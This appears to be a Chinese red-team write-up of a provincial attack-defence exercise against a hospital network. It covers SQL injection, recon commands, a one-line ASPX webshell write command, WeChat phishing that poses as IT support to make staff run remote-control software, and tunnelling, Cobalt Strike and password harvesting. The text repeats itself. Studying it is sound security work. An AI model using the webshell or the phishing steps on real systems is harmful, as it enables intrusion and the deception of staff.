近期某省级HVV实战回忆录

字数 3009 2025-10-26 18:21:34

HVV实战高级技巧教学：从边界突破到内网横向

文档说明：本文档基于一篇真实的省级HVV实战回忆录进行提炼和总结，旨在深入剖析在严格防守环境下，攻击队（红队）如何利用多种技术、社工技巧和顽强毅力，最终实现内网渗透。本文侧重于攻击思路、技巧细节和问题解决，适用于具备一定基础的网络安全从业人员进行学习和研究。

一、前期信息搜集与突破口选择

核心要点：当常规目标（公众号、小程序）防御坚固时，需扩大攻击面。

子域名与C段扫描：
- 技巧：主站防御严密时，利用子域名枚举工具发现次要业务系统。进一步对解析出的IP地址进行C段扫描，寻找同一网络环境下的其他资产。
- 价值：这些边缘系统往往运维投入较少，安全性较低，更容易成为突破口。本案例中，攻击者正是在C段发现了一个.net开发的网站。
快速漏洞验证：
- 技巧：对发现的新系统进行快速手动测试。对于老旧系统（如.net、ASP），SQL注入是常见高危漏洞。
- 案例：攻击者通过简单的手工注入测试，迅速确认了该网站存在SQL注入点，并直接使用sqlmap进行自动化利用，成功获取了数据库权限。

二、初始权限获取与环境侦察

核心要点：获取Shell后，第一时间判断权限、网络环境及安全软件情况。

权限判断：
- 命令：在数据库环境中，通过执行whoami或查询特定系统表来判断数据库连接权限。本案例中，攻击者发现当前是system权限，这是Windows系统的最高权限，为后续操作提供了极大便利。
网络环境侦察：
- 命令：使用netstat -ano或ipconfig /all查询网络连接和配置。
- 发现：
  - IP地址为172开头的私网地址，确认已进入内网。
  - 发现内网存在18段和16段两个网段，为后续横向移动指明了方向。
  - 关键点：尝试ping公网DNS（如114.114.114.114）或使用curl测试网络连通性。本案例中，发现该服务器完全不出网，这是一个重大障碍。
安全软件检查：
- 命令：使用tasklist或Get-Process查看运行进程。案例中未发现任何杀软，这降低了操作难度，但上线问题仍是核心矛盾。

三、突破“不出网”限制的多种尝试

这是本次实战的核心教学部分，展示了攻击者在受限环境下的 persistence（持久性）和 problem-solving（问题解决）能力。

尝试一：直接上线C2（失败）

过程：在发现system权限后，攻击者本能地尝试使用certutil、powershell等多种方式下载并执行C2木马。
结果：均告失败。原因在于服务器无任何外网连接能力。
教训：切勿惯性思维，默认所有服务器都能出网。 获取Shell后，网络连通性测试应是第一步。

尝试二：写入WebShell进行端口转发（失败但富有教育意义）

这是非常经典的一种“不出网”解决方案。

思路：既然无法直接连接外部C2，就在服务器上写入一个WebShell，通过Web协议建立一条隧道，将内网端口（如RDP的3389）转发出来。
操作步骤与遇到的坑：
- 步骤1：寻找网站根目录
  - 命令：for /r C:\ %i in (*.aspx) do echo %i。此命令会递归搜索C盘下所有.aspx文件并输出其路径，从而定位Web目录。
  - 结果：成功找到路径，但路径中包含中文目录。
- 步骤2：写入WebShell
  - 命令：cmd /c "d: & echo ^<%eval request("chopper")%^> > \a.aspx"。此命令切换到D盘，并写入一个一句话木马。
  - 注意：Windows命令行下写入特殊字符需要使用转义符^。
  - 遇到的坑1（中文路径）：在操作过程中，任何涉及中文路径的命令都会报错。这要求攻击者必须精准定位到无中文的路径或使用短文件名（8.3格式）绕过。
  - 遇到的坑2（写入成功但访问异常）：
    - 404错误：通常意味着文件未成功写入指定路径，或路径不正确。
    - 401错误：本案例中遇到此错误，意味着文件已存在，但服务器（IIS）对该文件没有执行权限，或该目录被禁止脚本执行。这可能是因为Web服务器配置了严格的权限策略或安装了Web应用防火墙（WAF）。
- 结果：此路径失败。WebShell无法正常连接，端口转发方案流产。

尝试三：社工钓鱼（成功）

当技术路径受阻时，人的因素成为关键突破口。

信息利用：从之前SQL注入爆出的数据中，提取了员工的手机号码。
目标选择：结合目标单位公众号（如“互联网医院”）的信息，确认了这些手机号对应人员的身份（如医生）。
社工过程：
- 通过微信直接添加目标为好友。
- 伪装成内部IT支持人员或其他可信身份，以“系统升级”、“安全巡检”等为由进行沟通。
- 关键技巧：沟通时语气要自然、自信，降低目标的警惕性。
绕过杀软：
- 直接发送可执行木马文件可能被拦截。本案例中，攻击者采用了更直接的方式：要求目标老师运行向日葵远程控制软件的便携版。
- 优势：向日葵、TeamViewer等合法远程工具是白名单软件，通常不会被杀软拦截，且操作直观，容易被目标接受。
成果：成功控制了一台办公电脑（社工机）。

四、内网横向移动与权限提升

核心要点：利用社工机作为跳板，重新对核心网络发起攻击。

环境分析：
- 发现社工机（主任电脑）配备了双网卡，可能同时连接办公网和核心业务网。
- 更重要的是，该机器上安装了iNode客户端（一种企业网络准入认证客户端），并且已经通过了认证。
- 价值：这意味着通过这台机器，攻击者可以直接访问之前无法触及的核心网络区域（如18段或16段的核心服务器区）。
隧道搭建：
- 立即在社工机上部署NPS或frp等隧道工具，将内网核心服务器的端口（如RDP、SSH）转发到攻击者的VPS上。
权限维持与信息搜集：
- 使用Cobalt Strike等工具生成木马，在社工机上获得一个稳定的Beacon。
- 利用此权限，横向扫描内网其他资产。
- 搜集浏览器密码、历史记录、敏感文件等，为进一步渗透做准备。

五、总结与核心知识点提炼

攻击面扩展：永不局限于主站，子域名、C段、边缘系统都是重要的突破口。
环境感知优先：获取任何权限后，立即评估：权限是什么？ 能出网吗？ 有杀软吗？ 内网结构如何？
绕过“不出网”：
- 技术层面：WebShell端口转发、DNS隧道、ICMP隧道、Socks代理等。
- 社工层面：当技术手段失效时，人是最薄弱的环节。钓鱼、语音电话诈骗（Vishing）都是有效手段。
合法工具利用：在钓鱼中，优先推荐目标使用向日葵、TeamViewer等合法远程工具，绕过杀软检测。
双网卡/多网卡主机的重要性：在内网中，定位到连接多个网络区域的主机是渗透过程中的重大转折点，它们通常是通往核心区域的“桥梁”。
毅力与灵活变通：本次实战充满了“没想到”的挫折，攻击者展现了出色的问题解决能力，在一条路走不通时，迅速切换思路，尝试新方法。

免责声明：本文档所有内容仅用于网络安全教学和研究，旨在提升防御能力。任何个人或组织不得利用文中描述的技术进行非法攻击。一切后果由使用者自行承担。

HVV实战高级技巧教学：从边界突破到内网横向文档说明：本文档基于一篇真实的省级HVV实战回忆录进行提炼和总结，旨在深入剖析在严格防守环境下，攻击队（红队）如何利用多种技术、社工技巧和顽强毅力，最终实现内网渗透。本文侧重于攻击思路、技巧细节和问题解决，适用于具备一定基础的网络安全从业人员进行学习和研究。一、前期信息搜集与突破口选择核心要点：当常规目标（公众号、小程序）防御坚固时，需扩大攻击面。子域名与C段扫描：技巧：主站防御严密时，利用子域名枚举工具发现次要业务系统。进一步对解析出的IP地址进行C段扫描，寻找同一网络环境下的其他资产。价值：这些边缘系统往往运维投入较少，安全性较低，更容易成为突破口。本案例中，攻击者正是在C段发现了一个 .net 开发的网站。快速漏洞验证：技巧：对发现的新系统进行快速手动测试。对于老旧系统（如 .net 、 ASP ），SQL注入是常见高危漏洞。案例：攻击者通过简单的手工注入测试，迅速确认了该网站存在SQL注入点，并直接使用 sqlmap 进行自动化利用，成功获取了数据库权限。二、初始权限获取与环境侦察核心要点：获取Shell后，第一时间判断权限、网络环境及安全软件情况。权限判断：命令：在数据库环境中，通过执行 whoami 或查询特定系统表来判断数据库连接权限。本案例中，攻击者发现当前是 system 权限，这是Windows系统的最高权限，为后续操作提供了极大便利。网络环境侦察：命令：使用 netstat -ano 或 ipconfig /all 查询网络连接和配置。发现： IP地址为 172 开头的私网地址，确认已进入内网。发现内网存在 18 段和 16 段两个网段，为后续横向移动指明了方向。关键点：尝试 ping 公网DNS（如 114.114.114.114 ）或使用 curl 测试网络连通性。本案例中，发现该服务器完全不出网，这是一个重大障碍。安全软件检查：命令：使用 tasklist 或 Get-Process 查看运行进程。案例中未发现任何杀软，这降低了操作难度，但上线问题仍是核心矛盾。三、突破“不出网”限制的多种尝试这是本次实战的核心教学部分，展示了攻击者在受限环境下的 persistence（持久性）和 problem-solving（问题解决）能力。尝试一：直接上线C2（失败）过程：在发现 system 权限后，攻击者本能地尝试使用 certutil 、 powershell 等多种方式下载并执行C2木马。结果：均告失败。原因在于服务器无任何外网连接能力。教训：切勿惯性思维，默认所有服务器都能出网。获取Shell后，网络连通性测试应是第一步。尝试二：写入WebShell进行端口转发（失败但富有教育意义）这是非常经典的一种“不出网”解决方案。思路：既然无法直接连接外部C2，就在服务器上写入一个WebShell，通过Web协议建立一条隧道，将内网端口（如RDP的3389）转发出来。操作步骤与遇到的坑：步骤1：寻找网站根目录命令： for /r C:\ %i in (*.aspx) do echo %i 。此命令会递归搜索C盘下所有 .aspx 文件并输出其路径，从而定位Web目录。结果：成功找到路径，但路径中包含中文目录。步骤2：写入WebShell 命令： cmd /c "d: & echo ^<%eval request("chopper")%^> > \a.aspx" 。此命令切换到D盘，并写入一个一句话木马。注意：Windows命令行下写入特殊字符需要使用转义符 ^ 。遇到的坑1（中文路径）：在操作过程中，任何涉及中文路径的命令都会报错。这要求攻击者必须精准定位到无中文的路径或使用短文件名（8.3格式）绕过。遇到的坑2（写入成功但访问异常）： 404错误：通常意味着文件未成功写入指定路径，或路径不正确。 401错误：本案例中遇到此错误，意味着文件已存在，但服务器（IIS）对该文件没有执行权限，或该目录被禁止脚本执行。这可能是因为Web服务器配置了严格的权限策略或安装了Web应用防火墙（WAF）。结果：此路径失败。WebShell无法正常连接，端口转发方案流产。尝试三：社工钓鱼（成功）当技术路径受阻时，人的因素成为关键突破口。信息利用：从之前SQL注入爆出的数据中，提取了员工的手机号码。目标选择：结合目标单位公众号（如“互联网医院”）的信息，确认了这些手机号对应人员的身份（如医生）。社工过程：通过微信直接添加目标为好友。伪装成内部IT支持人员或其他可信身份，以“系统升级”、“安全巡检”等为由进行沟通。关键技巧：沟通时语气要自然、自信，降低目标的警惕性。绕过杀软：直接发送可执行木马文件可能被拦截。本案例中，攻击者采用了更直接的方式：要求目标老师运行向日葵远程控制软件的便携版。优势：向日葵、TeamViewer等合法远程工具是白名单软件，通常不会被杀软拦截，且操作直观，容易被目标接受。成果：成功控制了一台办公电脑（社工机）。四、内网横向移动与权限提升核心要点：利用社工机作为跳板，重新对核心网络发起攻击。环境分析：发现社工机（主任电脑）配备了双网卡，可能同时连接办公网和核心业务网。更重要的是，该机器上安装了 iNode 客户端（一种企业网络准入认证客户端），并且已经通过了认证。价值：这意味着通过这台机器，攻击者可以直接访问之前无法触及的核心网络区域（如 18 段或 16 段的核心服务器区）。隧道搭建：立即在社工机上部署 NPS 或 frp 等隧道工具，将内网核心服务器的端口（如RDP、SSH）转发到攻击者的VPS上。权限维持与信息搜集：使用Cobalt Strike等工具生成木马，在社工机上获得一个稳定的Beacon。利用此权限，横向扫描内网其他资产。搜集浏览器密码、历史记录、敏感文件等，为进一步渗透做准备。五、总结与核心知识点提炼攻击面扩展：永不局限于主站，子域名、C段、边缘系统都是重要的突破口。环境感知优先：获取任何权限后，立即评估：权限是什么？能出网吗？有杀软吗？内网结构如何？绕过“不出网” ：技术层面：WebShell端口转发、DNS隧道、ICMP隧道、Socks代理等。社工层面：当技术手段失效时，人是最薄弱的环节。钓鱼、语音电话诈骗（Vishing）都是有效手段。合法工具利用：在钓鱼中，优先推荐目标使用向日葵、TeamViewer等合法远程工具，绕过杀软检测。双网卡/多网卡主机的重要性：在内网中，定位到连接多个网络区域的主机是渗透过程中的重大转折点，它们通常是通往核心区域的“桥梁”。毅力与灵活变通：本次实战充满了“没想到”的挫折，攻击者展现了出色的问题解决能力，在一条路走不通时，迅速切换思路，尝试新方法。免责声明：本文档所有内容仅用于网络安全教学和研究，旨在提升防御能力。任何个人或组织不得利用文中描述的技术进行非法攻击。一切后果由使用者自行承担。

HVV实战高级技巧教学：从边界突破到内网横向

一、 前期信息搜集与突破口选择

二、 初始权限获取与环境侦察

三、 突破“不出网”限制的多种尝试